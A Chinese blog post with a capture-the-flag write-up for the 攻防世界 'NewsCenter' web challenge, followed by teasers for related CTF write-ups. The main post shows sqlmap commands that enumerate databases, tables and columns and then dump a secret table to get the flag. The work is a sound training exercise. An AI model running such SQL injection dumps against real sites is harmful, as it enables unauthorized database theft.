攻防世界-WEB-NewsCenter

9月前作者：Lucifer_wei 分类：Toy博客阅读(34) 违法举报

这篇具有很好参考价值的文章主要介绍了攻防世界-WEB-NewsCenter。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

打开环境

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

有查询，猜测是sql注入

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

保存请求头到文件中

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

准备利用sqlmap

查找数据库

python sqlmap.py -r ./123.txt --dbs

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

查找表

python sqlmap.py -r ./123.txt --tables -D news

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

显示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

攻防世界-WEB-NewsCenter,CTF练习册,数据库,改行学it

得到flag

QCTF{sq1_inJec7ion_ezzz文章来源地址https://www.toymoban.com/news/detail-700277.html

到了这里，关于攻防世界-WEB-NewsCenter的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

攻防世界WEB练习区（backup、cookie、disabled_button）

前言作者简介：不知名白帽，网络安全学习者。博客主页：https://blog.csdn.net/m0_63127854?type=blog 攻防世界专栏：https://blog.csdn.net/m0_63127854/category_11983747.html 网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan 目录 backup 题目介绍题目思路访问靶场常见备份文件后缀名访问ind

2024年01月19日
浏览(30)
[CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码，然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。接下来，代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值，并进行字符串替换，将 php:// 替换为空字符串这是为了防止通过 URL 参数加载本地文件或其他可

2024年02月08日
浏览(46)
攻防世界ctf题目easyupload做题笔记。

刚刷完upload-labs靶场，做做ctf题目，发现自己掌握的知识并不牢固。做了半天没有解出来，最后还是看别人的题解做出来的。写下做题过程，也就是wp吧。为了方便以后复习巩固。本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行这里需要绕过的点如下检查文件内

2024年02月01日
浏览(40)
[CTF/网络安全]攻防世界 easyupload 解题详析

题目描述：一名合格的黑客眼中，所有的上传点都是开发者留下的后门惯例，上传一句话木马回显如下：也就是说文件被过滤抓包改后缀，.php1~.php9、.htaccess均被过滤（.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中，用来为该

2024年02月08日
浏览(55)
[CTF/网络安全] 攻防世界 cookie 解题详析

题目描述：X老师告诉小宁他在cookie里放了些东西，小宁疑惑地想：这是夹心饼干的意思吗？根据提示，获取页面Cookie中的数据即可页面提示 look here:cookie.php ，于是GET /cookie.php ：提示查看HTTP响应 method 1 HTTP响应通常可以在浏览器的开发者工具中找到。按下F12键打开浏览器

2024年02月05日
浏览(42)
[CTF/网络安全] 攻防世界 backup 解题详析

题目描述：X老师忘记删除备份文件，他派小宁同学去把备份文件找出来,一起来帮小宁同学吧！ PHP 脚本文件的备份文件名，通常采用以下命名方式：在原始文件名后添加日期时间戳。例如，如果要备份名为 index.php 的文件，则可以将其备份文件命名为 index_20230521_004017.php。这

2024年02月05日
浏览(64)
[CTF/网络安全] 攻防世界 PHP2 解题详析

翻译：你能给这个网站进行身份验证吗？ index.php是一个常见的文件名，通常用于Web服务器中的网站根目录下。它是默认的主页文件名，在访问一个网站时，如果没有特别指定页面文件名，则服务器会自动加载index.php文件。在Web应用程序中，index.php文件通常是网站的入口文件

2024年02月13日
浏览(45)
[CTF/网络安全] 攻防世界 php_rce 解题详析

PHP RCE 指的是通过远程代码执行漏洞（Remote Code Execution）来攻击 PHP 程序的一种方式。简单来说，由于PHP应用程序没有正确处理外部输入数据（如用户提交的表单、请求参数等），攻击者通过某些手段向 PHP 应用程序中注入恶意代码，然后通过这些恶意代码实现对受攻击服务器

2024年02月06日
浏览(50)
[CTF/网络安全] 攻防世界 weak_auth 解题详析

题目描述：小宁写了一个登陆验证页面，随手就设了一个密码。 weak_auth翻译：弱认证这个术语通常用来描述一种较弱的安全认证方法或机制，它可能存在安全漏洞，易受到攻击或者被绕过。在信息安全领域中，弱认证是一种常见的安全威胁。例如，使用简单的密码或者未加

2024年02月13日
浏览(43)
[CTF/网络安全] 攻防世界 simple_php 解题详析

题目描述：小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 $a=@$_GET[\\\'a\\\']; 从HTTP GET请求参数中获取一个名为a的变量，并将其赋值给变量a。@符号用于禁止错误输出，如果不存在参数a则会将变量a设置为NULL。 $b=@$_GET[\\\'b\\\']; 从HTTP GET请求参数中获取一个名为b的变量，

2024年02月13日
浏览(45)